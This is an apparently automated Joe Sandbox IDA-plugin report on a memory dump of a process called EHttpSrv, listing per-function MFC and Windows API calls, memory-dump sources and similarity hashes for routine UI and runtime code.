• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #265
• String ID:
• API String ID: 1803795300-0
• Opcode ID: 9b3e34e20514793be14f5fc2f0b18d951115683c20f85ad0fc61bec4e7d5a730
• Instruction ID: 9403ae3a06e9507dc1ff99d48ab7f3c065b4733f5c841587fd49247d63e3c639
• Opcode Fuzzy Hash: 9b3e34e20514793be14f5fc2f0b18d951115683c20f85ad0fc61bec4e7d5a730
• Instruction Fuzzy Hash: 295190366002018BCB18CF64C8527AB77A2EF88754F59C66CDD069F795E679FE42C780
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _wcsicmpfreememcpyreallocwcschr
• String ID:
• API String ID: 29784309-0
• Opcode ID: 2ca4960e8b7845ac15a85c0466c447a55554a0e6fb247eef4d323213e34a1664
• Instruction ID: feb4e5f844788c8695473aa1f2191a6a043e49db64690f2c89d34fc1cc0b7b57
• Opcode Fuzzy Hash: 2ca4960e8b7845ac15a85c0466c447a55554a0e6fb247eef4d323213e34a1664
• Instruction Fuzzy Hash: 1D31B6B2908700ABD304DF64DE81A3BB3E9EB94615F158A3DFC45D3380E639DD0586A2
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 2044F70F
• EnterCriticalSection.KERNEL32(?), ref: 2044F795
• LeaveCriticalSection.KERNEL32(?), ref: 2044F7B6
• #6751.MFC80U(00000000,?), ref: 2044F84A
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CriticalSection$#314#6751EnterLeave
• String ID:
• API String ID: 43741055-0
• Opcode ID: 81f2132f0f5e54a88fdd4fa29ecbc24753f534aa3ac267aedb014eeb049dfa1d
• Instruction ID: 2a341d5d441c251ca3bdd549d2104671dc06891eb54429a817a1eb2414ec20f1
• Opcode Fuzzy Hash: 81f2132f0f5e54a88fdd4fa29ecbc24753f534aa3ac267aedb014eeb049dfa1d
• Instruction Fuzzy Hash: 4341F271A047058FEB10DFA4C880B9677A5EF94B18F04CB7DE9589F291DB39E904CB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
                                                                                                                  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
                                                                                                                • #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                • #578.MFC80U ref: 20462C6E
                                                                                                                • #2461.MFC80U(00030003), ref: 20462CD7
                                                                                                                • #578.MFC80U ref: 20462D35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#2461#578$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 3417459804-0
                                                                                                                • Opcode ID: 371db3f090722565ab10a011f626aeafc9584fdcccf669e087e96a213066d7ca
                                                                                                                • Instruction ID: c2a683849d6fb96d4b3e35d838ed9aec9a96d629bdbd65cf109ae4fc9048b901
                                                                                                                • Opcode Fuzzy Hash: 371db3f090722565ab10a011f626aeafc9584fdcccf669e087e96a213066d7ca
                                                                                                                • Instruction Fuzzy Hash: B0412331608A00AFD304CBA0C94139E7BD4AB64B58F04CA3DFC45A7391DB3DDA4ACB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#314#762
                                                                                                                • String ID:
                                                                                                                • API String ID: 18822990-0
                                                                                                                • Opcode ID: 14400c33ff8118e7106871d96b4d195cf140b650c29abdceeccd6af731c5f2cb
                                                                                                                • Instruction ID: 680145d2944819133483d1aa39b31a240541b6f6ac57da04c80a782cee897e91
                                                                                                                • Opcode Fuzzy Hash: 14400c33ff8118e7106871d96b4d195cf140b650c29abdceeccd6af731c5f2cb
                                                                                                                • Instruction Fuzzy Hash: 80316D71A087419FD310DFA8C841B6BBBE4FB94A64F108A1DF95487790DB79E805CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,00000000,76945540,?,20420AC2,?), ref: 20421954
                                                                                                                • #764.MFC80U(?,?,?,00000000,76945540,?,20420AC2,?), ref: 2042196D
                                                                                                                • #764.MFC80U(00000000,00000000,?,?,00000000,76945540,?,20420AC2,?), ref: 204219D5
                                                                                                                • #1176.MFC80U(?,?,00000000,76945540,?,20420AC2,?), ref: 204219E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 987861311-0
                                                                                                                • Opcode ID: 20e9d8c626773fd68c79db1f578be4406d3d27dbf94b22d3dc0e594d28f61c13
                                                                                                                • Instruction ID: 65ffa9f82092dabdcb5bed94917da9e578248e28c1d1eeaeeb7bb9fc897bd46c
                                                                                                                • Opcode Fuzzy Hash: 20e9d8c626773fd68c79db1f578be4406d3d27dbf94b22d3dc0e594d28f61c13
                                                                                                                • Instruction Fuzzy Hash: 523141F2700B418FC720DFD9D8D192BB7E5BF68604794892DE28A87A60C635F884CB51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(00000000,?,20411B81,00000000), ref: 20411695
                                                                                                                • #764.MFC80U(FF000002,?,20411B81,00000000), ref: 204116AC
                                                                                                                • #265.MFC80U(00000000,?,20462D01,?,20411B81,00000000), ref: 204116E9
                                                                                                                • #265.MFC80U(00000000,?,20462D01,?,20411B81,00000000), ref: 20411746
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID:
                                                                                                                • API String ID: 2915978212-0
                                                                                                                • Opcode ID: ba2e8e614aacfb2c1cfc17631be87df5023eeda68792fc49645a80e1b67e0cd6
                                                                                                                • Instruction ID: 7a5158a3ee04ab6488e1a237766dc88d7216dad2747c0f1574a6556f2305acef
                                                                                                                • Opcode Fuzzy Hash: ba2e8e614aacfb2c1cfc17631be87df5023eeda68792fc49645a80e1b67e0cd6
                                                                                                                • Instruction Fuzzy Hash: 1F2173766002008BDB189F64CD567AB73A5EF84694F49C52CDD0A8F7A4E73AFE05C680
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20444DA6
                                                                                                                • #2461.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8,000000FF), ref: 20444DE9
                                                                                                                • #2461.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8), ref: 20444E54
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20444E8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2461$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 931018407-0
                                                                                                                • Opcode ID: 26d87b569da9c3e50e22f2a10a356677a855cf05579aeb297ba1f5042db95ef0
                                                                                                                • Instruction ID: 76b2dcf8fe44664dc88a3af28260734e3798ef99fca1d7f944336e42d88328c0
                                                                                                                • Opcode Fuzzy Hash: 26d87b569da9c3e50e22f2a10a356677a855cf05579aeb297ba1f5042db95ef0
                                                                                                                • Instruction Fuzzy Hash: FA318D31A087008FE310DFA4C885B9AB7E4FBA5768F60CA1DE855577E0DB39E905CB81
                                                                                                                APIs
                                                                                                                • #1894.MFC80U ref: 20433DEE
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433E9D
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433EAA
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433EB7
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F37
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F44
                                                                                                                  • Part of subcall function 20433ED0: InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Invalidate$#1894
                                                                                                                • String ID:
                                                                                                                • API String ID: 3887639419-0
                                                                                                                • Opcode ID: e815c2661e558f242e4c03c4ff3a68e1085abd3e151ac4e0b690b076e2d82447
                                                                                                                • Instruction ID: 669572870b13d328d3c28b5ce8d592afa34f028504738166e2341f06c687eada
                                                                                                                • Opcode Fuzzy Hash: e815c2661e558f242e4c03c4ff3a68e1085abd3e151ac4e0b690b076e2d82447
                                                                                                                • Instruction Fuzzy Hash: C22132722047046BD310DBA4CC92F6BB3E9FBD8719F108A1DF695872D0DBB5E9058B91
                                                                                                                APIs
                                                                                                                • #354.MFC80U(000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?,?,?,?), ref: 204758E1
                                                                                                                • #563.MFC80U(000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?,?,?,?), ref: 2047593A
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #1079.MFC80U(?,?,?,?,?,?,000000B2,?,FEEA6C22,?,00000000,2047D512,000000FF,20470A25,00000000,?), ref: 204759C8
                                                                                                                • LoadAcceleratorsW.USER32(?,00000084), ref: 204759D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#557Load$#1079#354#530#563#572#6003AcceleratorsCursorEmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2898300369-0
                                                                                                                • Opcode ID: 25145885f755b7da27b2183d7801b8a14ebb19caded4335ed2728ef1bae41064
                                                                                                                • Instruction ID: c9898c695ffcc76be56d112311e911471fd38206f09a34854931a16e4d6a0a3e
                                                                                                                • Opcode Fuzzy Hash: 25145885f755b7da27b2183d7801b8a14ebb19caded4335ed2728ef1bae41064
                                                                                                                • Instruction Fuzzy Hash: 1831E8B1508B818FD361CF78C445B9BBBE4BB59718F008E1DE5EAC7251DB78A508CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: mallocmemsetwcscpy_s
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204332EF
                                                                                                                • PtInRect.USER32(?,?,?), ref: 20433304
                                                                                                                • ScreenToClient.USER32(?,?), ref: 20433317
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • #925.MFC80U(?,?,00000000), ref: 20433364
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#925ClientScreenWindow
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 2042059A
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 204205BF
                                                                                                                • GetSysColor.USER32(0000000E), ref: 204205E4
                                                                                                                • GetSysColor.USER32(0000000D), ref: 204205EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: #764Color$#572
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION ref: 20410CE5
                                                                                                                • malloc.MSVCR80 ref: 20410CF1
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?,?,20410C8F), ref: 20410D06
                                                                                                                • VerQueryValueW.VERSION ref: 20410D32
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValuemalloc
                                                                                                                APIs
                                                                                                                • #1921.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613AF
                                                                                                                  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
                                                                                                                  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                • #651.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613EB
                                                                                                                • #658.MFC80U(FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B,?), ref: 204613FB
                                                                                                                • #718.MFC80U(?,00000004,00000002,6C4E60B9,FEEA6C22,00000000,?,?,00000000,2047D9E8,000000FF,20470C23,FEEA6C22,-00003AB4,?,00000000), ref: 20461425
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: #578#745$#1921#6003#651#658#718#722#741#764CursorDestroyfree
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,76945540,?,204602E5), ref: 20460309
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,76945540,?,204602E5), ref: 2046032C
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2046035B
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFF), ref: 20460398
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749MessageSend
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,76945540,00000000,204615CF), ref: 204615F9
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,76945540,00000000,204615CF), ref: 2046161C
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2046164B
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20461688
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749MessageSend
                                                                                                                APIs
                                                                                                                • #4755.MFC80U(FEEA6C22), ref: 2042FC3D
                                                                                                                • #330.MFC80U ref: 2042FC4D
                                                                                                                • GetClientRect.USER32(?,?), ref: 2042FC63
